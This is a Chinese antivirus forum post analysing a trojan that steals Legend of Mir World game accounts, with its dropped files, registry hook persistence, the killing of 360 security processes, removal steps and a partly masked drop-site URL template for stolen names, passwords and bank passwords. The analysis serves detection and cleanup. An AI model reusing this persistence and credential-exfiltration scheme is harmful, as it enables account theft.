找回密码
 注册创意安天

Trojan/Win32.OnLineGames.bkzg[GameThief]分析

[复制链接]
发表于 2009-4-3 10:57 | 显示全部楼层 |阅读模式
本帖最后由 flyleaf 于 2009-7-1 14:14 编辑

一、 病毒标签:
病毒名称: Trojan/Win32.OnLineGames.bkzg[GameThief]
病毒类型: 木马
文件 MD5: D8FA90F2A769C994081321D805E91C8E
公开范围: 完全公开
危害等级: 3
文件长度: 15,301 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: FSG 2.0

二、 病毒描述:
该病毒为盗取传奇世界游戏账号类木马,病毒运行后获取随即八位字母,依次为病毒名,以nls为扩展名衍生病毒文件到%Windir%\fonts目录下,加载dll文件并调用dll中的功能模块,执行注册dll,修改注册表添加hook项等操作;遍历进程列表,检测进程中调用了woool.dat文件的进程并将之关闭。为命令行创建线程删除病毒本体。Dll文件被加载后重新加载自身,检测360相关进程成并将之关闭。检测传奇世界进程。发现后捕获用户输入,发送到指定的收取页面。

三、 行为分析:
本地行为:
1、文件运行后会释放以下文件
%Windir%\Fonts\gzcqsj01.dat                        42 字节
%Windir%\Fonts\pddwrwks.nls                        49,152 字节[8位随机文件名]
2、新增注册表
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}\InprocServer32]
注册表值: "@"
类型: REG_SZ
值: "C:\WINDOWS\fonts\pddwrwks.nls"
描述:为动态链接库文件注册ID
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
注册表值: "{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}"
类型: REG_SZ
值: ""
描述:添加hook用以截获用户的相关信息

网络行为:
收信地址:
http://www.md5ss**.com/CS/B51/05ndisaeas/post.asp
回传参数:
格式1:
http://www.md5ss**.com/CS/B51/05ndisaeas/post.asp?gametype=cqsj&para=%s&%ver=0316&zone=%s&server=%s&name=%s&password=%s&secopass=%s&nickname=%s&lord=%s&level=%s&money=%u&goldcoin=%u&yb=%u&equipment=%s&bag=%s&mb=%d&mbtime=%d&hardinfo=%s&norefreshcode=%s
格式2:
http://www.md5ss**.com/CS/B51/05ndisaeas/post.asp?gametype=cqsj&name=%s&password=%s&zone=%s&server=%s&bankpass=%s&level=%s&mb=%d&norefreshcode=%s

注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Temp%  = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
    %Windir%\                           WINDODWS所在目录
%DriveLetter%\                        逻辑驱动器根目录
%ProgramFiles%\                        系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\        当前用户文档根目录

四、 清除方案:
1、使用安天防线可彻底清除此病毒(推荐)。
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1) 恢复修改的注册表
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}\InprocServer32]
注册表值: "@"
类型: REG_SZ
值: "C:\WINDOWS\fonts\pddwrwks.nls"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
注册表值: "{6BF8912E-DE56-4948-83E8-90D2C3F5EB3E}"
类型: REG_SZ
值: ""
(2) 重新启动计算机,删除病毒文件
%Windir%\Fonts\gzcqsj01.dat
%Windir%\Fonts\pddwrwks.nls[随即8位文件名]
您需要登录后才可以回帖 登录 | 注册创意安天

本版积分规则

Archiver|手机版|小黑屋|创意安天 ( 京ICP备09068574,ICP证100468号。 )

GMT+8, 2024-11-18 03:44

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表